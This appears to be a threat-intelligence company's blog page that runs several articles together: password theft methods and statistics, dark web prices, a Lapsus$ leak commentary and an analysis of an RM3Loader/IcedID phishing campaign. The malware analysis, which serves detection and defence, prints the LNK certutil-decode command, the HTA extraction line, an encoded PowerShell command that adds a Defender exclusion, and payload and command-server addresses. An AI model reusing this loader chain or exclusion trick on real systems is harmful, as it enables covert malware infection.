Once installed on a victim’s device, TrickBot would identify when victims attempted to access banking services online and provide them with a cloned website, controlled by the threat actor.  Subsequently, they would then be able to see what the victim was typing, thereby gaining access to their login details.  To preserve the illusion that nothing was amiss, the threat actor would then redirect the victim to the legitimate site as if they were logged in.  The threat actor would then capture the victim’s credentials, allowing them to log in whenever they saw fit.

Infostealer malware is much simpler.  Once installed on a device, it can quickly query common areas of a device used for password storage, and send this data to a waiting server controlled by a threat actor.  Owing to the various deployment methods used, threat actors can quickly generate a large volume of content from infostealer malware.  This content is then sorted and sold online, or at times even given away.  Further information regarding infostealer malware can be found in our article here.

Phishing

Phishing requires an element of trickery from the threat actor.  In this situation, they are portraying themselves as something they aren’t to trick the victim into divulging their credentials.  This can often be in the form of messages (email, SMS etc) asking victims to clarify their credentials associated to a legitimate service, i.e. banking, or premium services such as Netflix.  The threat actor will also provide a convenient link for the victim however, this link will invariably lead to a cloned website controlled by the threat actor, who can then collect credentials as victims input them.

Social Engineering

Remembering passwords for all the different services we use can be tiresome.  It has been estimated that the average person has over 100 passwords to remember.  Therefore it’s only natural that we utilise the things in our lives that matter most when coming up with passwords.  Significant dates, names of pets, and our favourite locations.  All can be useful when creating passwords as you’re more likely to remember these details.

The problem comes with our online activity.  Many people are very public about what they post online, and we talk about the things we like and what’s important to us.  If we’re then using those important things to generate our passwords, it becomes very easy for threat actors to do a little research into us to discover those passwords for themselves.

As an example, we have identified within our data collections that “fiona2014” is one of the most commonly used passwords.  If someone were to be using this password, it could be very easy to use social engineering to obtain it.  It would be straightforward to talk to someone, engage them about their life, and quickly find out they have a daughter called Fiona who is 10 years old.  Putting these details together we can come to “fiona2014”.

Dictionary Attacks

We are inundated with accounts requiring passwords, so it is common for people to use simple passwords to avoid having to remember anything too complex.  Threat actors rely on this as the basis for a “dictionary attack”.  Years of data regarding passwords has allowed for generating files containing thousands of common passwords and their variants.  These files then allow a threat actor to query a service, armed with a victim’s email address, and try each password until the service allows them to log in.

Thankfully, dictionary attacks are somewhat easier to defend against.  Most services will now only allow a few login attempts before any suspicious activity is flagged and the account is locked down.  Threat actors will constantly look for methods to bypass this security, so the best option is to keep those passwords unique.

Brute Force

When finesse will not work, take a sledgehammer to the door.  Brute force requires a threat actor to have some coding knowledge.  They can write code which will query a service to attempt a login, but instead of being more methodical, this method is more trial and error.  Commonly, brute force attacks will iterate through millions of potential combinations to find the correct password (assuming that any security the service has does not lock the account down).  This method can be more easily defeated by using longer, more complex passwords, and we will explain why shortly.

Brute force attacks can also occur when a threat actor obtains a username:password combination for a particular site.  Banking on poor password hygiene, they will attempt the same combination across multiple sites to see if there has been any password reuse.

What happens when your credentials are compromised

What happens when credentials are compromised depends on who the victim is.

Compromise of personal accounts tends to provide threat actors with access to various services and information, including the victims’ banking, online shopping, premium entertainment services etc.  These have some value to others, who may want the benefits of those services without having to pay, e.g. to watch Netflix, listen to Spotify etc.  These types of data will often be grouped and sold in bulk on online forums for a fraction of the cost of the service they give access to.

Real value for threat actors comes from compromised corporate accounts.  These accounts allow a threat actor to access a corporate system, giving them a platform to launch further criminal activity.  There is an entire marketplace dedicated to gaining initial access to corporate systems – initial access brokerage – and depending on the size of the victim, can bring in thousands of pounds for the threat actor selling credentials.  Such access can be a precursor to more serious cybersecurity events, such as data theft/loss, or the deployment of ransomware.

Password hygiene and habits

Now for the statistics.

We have taken a sample of data collated by SOS intelligence in March 2024, totalling over 10 million passwords obtained by infostealer malware.

The most common password length was 8 characters, with an average length across the dataset of 10.5.  This was to be expected as 8 characters is often presented as a minimum across many password policies.  Additionally, it’s also the number of characters in “password”…

Top 20 most common passwords
PasswordCount
12345651022
admin22322
https16682
1234567816525
12345678915737
123458958
Profiles8611
password6533
Opera3946
12345678903326
1231233093
12345672923
Aa1234562866
Kubiak222821
Pass@1232761
Password2665
1111112488
fiona20142206
123456789102043
P@ssw0rd2029

On that note, the word “password”, and numerous variants utilising common character substitutions, appeared over 37,000 times.  “admin” appeared more than 22,000 times, while “https” was used more than 16,000 times.  This is concerning as dictionary attacks will often focus on keywords such as this first, knowing they are so common.  “admin” is frequently used as a default password on routers and other IoT devices which highlights the ongoing vulnerability of these devices.

In total, approximately 1 million passwords contained only digits, while approximately another 1 million contained only letter characters.  Overall, over 7.5 million passwords contained no special characters.

So the fundamental question is, why are these statistics important, and how can we use them to improve our password hygiene?

Password strength works based on “entropy” – the measure of randomness or uncertainty of the password.  Password entropy allows us to quantify the difficulty or effort required to guess, or “crack”, a password using brute force or other similar methods.  As a general rule, higher entropy passwords are deemed stronger and more secure.

We measure entropy in bits. The number of bits a password has indicates how strong it is.  The basic formula for calculating entropy looks like this:

 Entropy = log2​(NL)

Where:

  • N is the number of possible characters in the character set used for the password
  • L is the length of the password (in characters)
  • log2 is the base-2 logarithm

Taking this formula we can see that the longer a password is, and the more characters it pools from, the higher entropy it will have.  We can visualise this with our data.

Using a length of 8 (being the most commonly seen) we can see the entropy when different sizes of character sets are used:


NumericalSingle CaseAll CaseAlphanumericAlphanumeric w/ Special Characters
Total # of characters1026526292
Entropy26.5837.6045.6047.6352.19

If we increase the password length to 12, strength increases significantly:


NumericalSingle CaseAll CaseAlphanumericAlphanumeric w/ Special Characters
Total # of characters1026526292
Entropy39.8656.4168.4171.4578.28

Based on the above, working at 1000 guesses per second, a brute force attack on an 8-character numerical password would take about 27 hours.  However, a similar attack on a 12-character password utilising alphanumeric and special characters would take roughly 11.5 billion years!

The key factor to note here is that there is a reason we’re always asked for longer passwords with uppercase, lowercase, numbers and special characters – they’re that much stronger and secure.

So a crucial question remains; what should be done with this information?  We sincerely hope that what we’ve discussed here will highlight the need for strong and enforced password policies.  These should factor in the following:

  • Use of alphanumeric and special characters
  • Mandatory lengths (at least 10, but longer is better)
  • No password reuse
  • Frequent and enforced password changing.

Wherever possible, we would highly recommend the use of password managers.  They can save a lot of time for users, allow for significantly more complex passwords to be used, and only require the user to remember one password.  We don’t recommend using one product over another, but one such example would be KeePassXC.  KeePassXC is a host-based password vault which keeps passwords encrypted when not in use.  It offers numerous options for password generation, varying on characters used, length etc.  The benefits of this are that you can generate passwords up to 128 characters long, which simply need to be copied and pasted whenever they are required.  Here is one such example with an entropy value of 715:

J4kKutHec3RYxQo3kpm4mot5EAVp&opRCSr&x4J5r%fQ$XxzrjdW2ZgRg@k42XhA@zz`S4ofiR4~^s`&43zZ@JQ&qQ$Mad2^jtQdHSZ@hbJbVk5Qabvs5Kc$KW3#W@Rm

What our external research shows

Research conducted by NordPass in 2022 identified that the average person has approximately 100 user accounts requiring password verification.  This is the most probable cause for password reuse and password fatigue; where users are exasperated by the constant need to generate unique strong passwords and fall into a habit of using weak, easy-to-remember passwords, or reusing old ones. Verizon’s Data Breach Investigations Report, published in 2021, estimates that 80% of hacking-related breaches were a result of stolen or brute-forced credentials.  This number could be significantly reduced by ensuring and maintaining good password hygiene.

Forgetting passwords can have a significant impact on the password owner, the services they use, and the organisations they work for:

  • Research firm Forrester has indicated that, for some organisations, the costs associated with handling password resets could be up to $1 million USD per year.  Gartner estimates that around 40% of help desk queries in large companies relate to password resets, taking up a substantial part of billable work, and taking focus away from more business-critical support.
  • In 2017, MasterCard and the University of Oxford published a study looking at users of online shopping platforms.  Their research indicates that 33% of users would abandon a purchase if they could not remember an account password, while 19% would abandon a purchase while waiting for a password reset link.
  • Chainalysis, a cryptocurrency data firm, estimates that 20% of all mined Bitcoin are locked in lost or otherwise inaccessible wallets.  In one such example, one user has 7002 Bitcoins locked within a hard drive, which risks being encrypted following two more incorrect password attempts.

What is SOS Intelligence doing, and how can it benefit you?

At SOS Intelligence, we understand the risk that credential theft can pose to the security of your data.  What we can provide is early detection for when your data has been exposed. 

We are actively collecting and analysing stolen credentials from multiple sources which feeds into our intelligence pipeline.  Within moments of ingestion, we can generate bespoke alerts for you to indicate when you may be at risk.  Early detection is vital to allow you to take action before an issue becomes serious and impactful against your business.

If you are serious about your cyber security, why not book a demo?

Photos by Ed Hardie on Unsplash,  Ryunosuke Kikuno on Unsplash, Joshua Hoehne on Unsplash

"Dark
Investigation, The Dark Web

Dark Web Services Current Average Prices

It started with a tweet.

The dark web has long been associated with illegal activities and the sale of illicit goods and services. Among the many services offered on the dark web, hacking services are particularly prevalent.

Daniel’s tweet

We had our PIR and got to writing an Intelligence Requirements sheet following the PESTLEP model and that allowed us to prioritise our Collection Plan.

Collection plan.

With which we were able to start our collection process and begin answering Daniel Card’s Tweet.

The collection process consisted of using the SOS Intelligence platform to identify current active market places for the specific IR areas we had to answer to.

Our platform has the capability to scan the dark web very quickly, with the ability to rotate around all active Onion services within 24-48 hours. This gives us a clear view of current and active Onion services.

In addition SOS Intelligence has a broad range of automatic closed and open forum collection giving us a real time view into purchases and sales.

Gathering the relevant information and calculating averages per service, per market place. 

The research

The research for this article looked at around 40 different current dark web marketplaces and clear web and dark web forums, where hacking services are commonly offered for sale. The average prices for the services mentioned were determined based on the information gathered from these sources.

According to our research, the average price for a stolen credit card on the dark web is around $243.15.

This may seem like a low price, but the value of a stolen credit card can vary depending on the country it was issued in and the remaining balance on the card. For example, a credit card from the United States may be worth more than one from a less economically developed country. To keep things as like for like as possible we took the average card limit for a USA bank.

Counterfeit money is also commonly available on the dark web, with the average price per $1,000 coming in at around $396.24.

This may seem like a high price, but it’s important to remember that producing high-quality counterfeit money can be a time-consuming and expensive process.

Botnets, which are networks of compromised computers used to launch distributed denial of service (DDoS) attacks, are also commonly available on the dark web.

The average price for a botnet or DDoS attack is around $382.41.

Another common service offered on the dark web is the sale of  so called residential proxies,  which are more difficult to detect and block as they “proxy” a cyber criminals connection out through a residential ISP. These proxies are used to mask the true IP address of the user and are often used by hackers to avoid detection.

The average price for a residential proxy is around $645 per month.

Finally, initial access to a target network is often available for sale on closed forums and marketplaces. This can include login credentials or vulnerabilities in a network that can be exploited to gain access, Initial Access or AI is typically the first ‘open door’ into a victim’s network and can lead to ransomware.

Prices for this service ranged wildly from a few hundred dollars to tens of thousands, due to wide ranging victims and seller motivations, varying greatly depending on access offered, method of access and compromised company.

The average price for initial access to a network is around $7,700. 

In conclusion, the dark web is a hub for a wide range of hacking services, from stolen credit card information to initial access to target networks.

While the prices for these services may seem steep, it’s important to remember that at least for some of the services offered there is a more demand than supply.

It is also important to note that there is no guarantee with any of the services provided and the sellers or marketplaces themselves could be scams or scammers although a majority do offer purchase through escrow.

Header photo by Jefferson Santos on Unsplash.

"SOS
Investigation

Investigation into the RM3Loader lnk delivery with a Michael Page recruitment campaign theme

Authors: Manraj and Amir Hadzipasic

SOS Intelligence observed an unusual phishing campaign that appeared to be delivering a PDF. Although malware is not a focus for us we couldn’t ignore the opportunity to investigate a new and interesting malware delivery mechanism.  

Sample 1 Email Headers

spf=pass [email protected];

dkim=pass header.d=aruba.it header.s=a1;

dmarc=none

Received: from smtp202-pc.aruba.it (smtp202-pc.aruba.it [62.149.157.202])

by with ESMTP id 3jsqqq1e9h-1

for <>; Tue, 27 Sep 2022 15:28:52 +0100

Received: from [127.0.0.1] ([83.32.137.88])

Content-Type: text/html; charset=UTF-8

Subject: A New Career Opportunity

From: “Michael Page Recruitment”

Date: Tue, 27 Sep 2022 07:28:51 -0700

Message-ID: <[email protected]>

To: 

X-Mailer: Apple Mail (2.2104)

Link: https://kakjumi[.]com/download/?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close=[REDACTED]&t=[REDACTED]&id=[REDACTED]

Updated Date: 2022-09-08T07:00:00Z

Creation Date: 2020-07-09T07:00:00Z

Registrar Registration Expiration Date: 2023-07-09T07:00:00Z

Registrar: NameSilo, LLC

Redirects to

https://michaelpageuk5ukln[.]com/michael-page/log.php?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close=[REDACTED]&id= [REDACTED]

Updated Date: 2022-08-23T00:00:00Z

Creation Date: 2022-08-23T02:51:42Z

Registrar Registration Expiration Date: 2023-08-23T00:00:00Z

Registrar: ERANET INTERNATIONAL LIMITED

Sample 2 Email Headers

spf=pass [email protected];

dkim=pass header.d=encoreshop.com.br header.s=20211014;

dmarc=none

Received: from us2-ob2-1.mailhostbox.com (us2-ob2-1.mailhostbox.com [162.210.70.55])

by with ESMTPS id 3jsqqq1f8t-1

(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)

for <>; Tue, 27 Sep 2022 16:46:13 +0100

Received: from [127.0.0.1] (unknown [87.116.246.51]

From: “Michael Page Recruitment”

Subject: Work with us

Date: Tue, 27 Sep 2022 08:46:10 -0700

Importance: normal

X-Priority: 3

Content-Type: text/html; charset=”UTF-8″

Link:

https://tyte-hosting[.]com/download/?t=[REDACTED]&close=[REDACTED]&ynu=[REDACTED]&rht=[REDACTED]&pass = [REDACTED]&id=[REDACTED]

Updated Date: 2022-09-21T16:51:32Z

Creation Date: 2004-09-25T05:30:32Z

Registrar Registration Expiration Date: 2023-09-25T05:30:32Z

Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com

Redirects to:

https://michaelpageuk5ukln[.]com/michael-page/log.php?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close =[REDACTED]&id=[REDACTED]

Phishing/Malware download page

The application appears to be more advanced than generic phishing kits. It features an initial CAPTCHA and a number of API callbacks. 

Downloaded Zip LNK content, self referencing 

%comspec% /c if exist %tmp%\temp1_job_offer.zip\job_description.pdf.lnk  (certutil.exe -decode %tmp%\temp1_job_offer.zip\job_description.pdf.lnk %tmp%\.hta&start %tmp%\.hta) else (certutil -decode job_description.pdf.lnk %tmp%\.hta&start %tmp%\.hta)

Ensures that the hta file is produced regardless of how the lnk is executed, either from within the zip archive via cmd.exe /c or dropped via certutil decode – in parallel. 

Certutil is used to decode the embedded BASE64 encoded HTA file.

It is then called for execution by the &start statement. 

The HTA file is nested, self referencing contains the decoy PDF, assumed to be IceID DLL and other elements. 

The HTA code is self contained, encoded in base64 within the pdf.lnk, disguised as a certificate and is decoded and written as a .HTA when the certutil -decode command is run.

Hta file structure  

HTTP Callback

This function may just be for statistics/tracking purposes.  

Offset extraction, launching of decoy PDF  and dll

Offset extraction is performed through the use of the ADODB.Stream function to read / write parts of the HTA document, as in this case the sample we saw loads in sections of embedded content and saves them to the user profile temp location via calling specific file size offsets. This is selected by wrapping the file openastextstream() function inside a mid() function and selecting the start position and length of the string.

:x=mid(fil.openastextstream().read(fil.size), 7928,85890)

The dll is loaded via regsvr32 passing the /s (silent) flag. It has been observed that the dll will not execute with regsvr32 unless the /s flag is used.

The dll is 342,323KB!, however after offset 000837E0 the entirety of the DLL’s contents is /x20 (space). I noticed that this may(?) be an anti-analysis technique as most sandboxes will not accept a file over 60mb and tools will not effectively handle a dll over 40mb such as CFF explorer.

Calls to 91.240.118.155 HTTPS (michaelpageuk5ukln.com, prakebtpboylodod.com)

Prakebtpboylodod.com hosts http://prakebtpboylodod[.]com/s2.dll which appears to be fetched by the originally loaded dll.

The script also calls for a defender exception to “C:\” and the waits for 15 seconds

set q=CreateObject(“WScript.Shell”):q.Run “powershell -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAIgA7AHQAaQBtAGUAbwB1AHQAIAAxADUA”,0:q.Run “timeout.exe /t 30”, 0, True

Encoded Powershell command:

Add-MpPreference -ExclusionPath “C:\”;timeout 15

A further timeout.exe is run for 30 seconds. 

Timeout.exe being run in your environment should be suspicious. 

Execution Overview Diagram 

The hta embedded pdf although benign itself, being observed open in msedge as part of clicking the lnk within the zip archive or externally is an indicator of infection. 

Network based indicators 

Once the DLL is run, regsvr32.exe makes connections from different local ports to port 443 on the remote host. The local port numbers that connections come from increment sequentially when a connection can not be established. Seeing regsvr32.exe make multiple outbound connections should be considered suspicious.

In addition to this, seeing timeout.exe making outbound connections to port 443 should also be considered suspicious.

Host based indicators

Host based indicators

Files created

C:\Users\%USERPROFILE%\AppData\Local\Temp\temp1_job_offer.zip

C:\Users\%USERPROFILE%\AppData\Local\Temp.hta

C:\Users\%USERPROFILE%\AppData\Local\Temp\job_description.pdf

C:\Users\%USERPROFILE%\AppData\Local\Temp\x.dll

This loader seems to prefer to store files with the temp folder and uses the user environment variable of %tmp% or via GetSpecialFolder(2) (2 = Temp).

File hashes:

dll:

e2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd 

pdf:

e2981bd67116d744e2af43b0fc864e255dd57b1b961110df12a3d98ec465e947

Second “dll”:

a5a211ceeccbe61c374fec9286e0185674a2ba98bc82711cf61f57b586fd7f19

job_offer.zip

3bcfe639a418ffca0e3e839dc19d394b7b4455ce24db3fbb5cc09a7169da4046 

dll runtime IOCs 

RM3Loader CnC Panel communication:

Higmon.cyou

Prises.cyou

45.8.147.179

45.67.229.39

Stark-Industries is an allegedly Russian owned & operated hosting company that has been observed being used by a number of various campaigns.

[ref] https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-vmware-rce-flaw-to-install-backdoors/

[ref ]https://twitter.com/JAMESWT_MHT/status/1558171595562254340

Task Item embedded in email sample:

We are unsure exactly how this feature applies but it could be something specific to an outlook client allowing for automatic creation of a Task.

The activity of using a zip file with a document inside (in our unique case a pdf.lnk) has previously been observed with the IcedID malware. In both cases use mshta.exe to execute an .hta file which then results in a malicious dll being written to disk.

The main differences are that the previously observed activity documented by Vmware uses the .hta to download the dll from a remote server, whereas we have observed a unique method of unpacking and executing the first stage payload. The pdf.lnk contains the .hta file, base64 encoded disguised as a certificate.

When this is decoded and written to disk, the .hta then references itself by offset to unpack the malicious dll and decody pdf. https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html 

Another similar sample can be found here, with a number of other public submissions being attributed to IcedID. A commonality with these samples is that they convey themselves to be business related documents (invoice.zip, request.zip etc), however when unzipped seem to be .rtf documents, word documents with macros or .lnk files disguised as folder shortcuts (Documents.lnk).  https://any.run/malware-trends/icedid

Key takeaways

  • RM3Loader is using a self referencing LNK file to execute commands that self reference.
  • Payload contained within the dropped Zip file and decoded using CertUtils.
  • LNK does an important job of decoding the embedded HTA file and executing it.
  • HTA contains VBScript that self references content embedded in the HTA file to deploy a decoy PDF document and load the IceID dll.
  • IceID behaviour has not significantly changed.
"Lapsus$"/
Investigation

SOS Intelligence analysing Lapsus$ data and breaches

We’ve been tracking what Lapsus$ have been doing and we’ve been analysing the data from the latest breaches. Like most hacking collectives SOS Intelligence has been aware of and tracking the activity of the LAPSUS$ group for some time.

The group has contributed to some high profile and impact breaches in the last few months. They have been utilising what could be considered as fairly “low tech” methods to gain a foothold on their targets. Using our multi-faceted intelligence collection pipelines we are able to keep a track of the groups activities and announcements.

This time, the data included a large amount of GitHub source code that appears to belong to Globant, a major company with over 16000 employees and and $1.2 billion in revenue for 2021. This is with a number of repositories that contain “very sensitive information” such as TLS certificate private keys and chains, Azure keys and API keys for 3rd-party services.

TechCrunch have written about this and we were quoted on their article:

SOS Intelligence, a U.K-based threat intelligence provider that analyzed the leaked data, told TechCrunch that “the leak is legitimate and very significant, as far as Globant and Globant impacted customers are concerned.”

Techcrunch, March 30th 2022

Lapsus$ were only just in the news days ago with an Oxford teen accused of being multi-millionaire cyber-criminal connected with the group. Joe Tidy has an excellent article of what happened and how the teen in question was “doxxed” over on the BBC.

ITPro also cover this with comment from ourselves:

“From the paths I have looked at so far it looks like legitimate source code for mobile apps,” said Amir Hadžipašić, CEO and founder of SOS Intelligence to IT Pro. “It looks like there are internal microsites and data for them too, CVs and other personal information.

“That’s not all, they have full private keys for certs in most of the directories,” he added. “That there would be enough for me to stand up a website and serve their SSL and it be valid.”

IT Pro, 30th March 2022

Last but not least, we spoke to Bleeping Computer who have also covered this:

“In terms of legitimacy, going just by volume alone it’s hard to fabricate that amount of data – however samples of the data have been cross referenced with live systems and other methods that show the leak is legitimate and very significant as far as Globant and Globant’s impacted customers are concerned”.

Bleeping Computer, March 30 2022

For any size organisation, we help you sleep easier by giving you real time alerts of key phrases, emails and domains that appear on the Dark Web. For a demo, click here and we look forward to helping you.

Photo by Clint Patterson on Unsplash.

1 2
Now recruiting MSSP partners · deploy dark web monitoring under your own brand in 48 hours | Sign up to the Partner Portal →
Privacy Settings
We use cookies to enhance your experience while using our website. If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. We also use content and scripts from third parties that may use tracking technologies. You can selectively provide your consent below to allow such third party embeds. For complete information about the cookies we use, data we collect and how we process them, please check our Privacy Policy
Youtube
Consent to display content from - Youtube
Vimeo
Consent to display content from - Vimeo
Google Maps
Consent to display content from - Google
Spotify
Consent to display content from - Spotify
Sound Cloud
Consent to display content from - Sound